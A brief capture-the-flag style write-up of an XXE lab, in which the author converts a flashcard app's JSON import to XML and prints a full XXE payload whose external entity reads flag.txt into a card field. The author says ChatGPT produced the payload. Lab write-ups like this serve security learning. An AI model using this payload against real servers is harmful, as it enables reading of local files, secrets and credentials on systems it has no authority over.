Tanuki

Today comes with an XXE lab.

Whenever you can upload JSON, you should always try and upload XML too. Sometimes this will be refused by the server, but sometimes the server happily accepts it. In this lab, we know we can upload XML because the frontend tells us so.

Don't forget to update your Content-Type to application/xml

First thing to do is look at the JSON example.

{
"name": "Sample Deck",
"description": "A sample deck showing the import format for custom flashcards",
"category": "Example",
"cards":
[ { "front": "What is the capital of France?",
"back": "Paris - the city of lights and capital of France since 987 AD." },
{ "front": "What programming language is this app built with?",
"back": "JavaScript - using Node.js for backend and React for frontend." }
]
}

I ran this JSON through ChatGPT with the question to make a XXE DTD PoC from it. ChatGPT is my cool friend and helped me out.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
    <!ELEMENT creds ANY >
    <!ENTITY xxe SYSTEM "file://flag.txt" >]>
        <deck>
            <name>Ex Deck</name>
                <cards>
                    <card>
                        <front>&xxe;</front>
                        <back>pass</back>
                    </card>
                </cards>
        </deck>

After uploading this payload, I opened up my deck.

The <front> tag displayed my flag 🇧🇪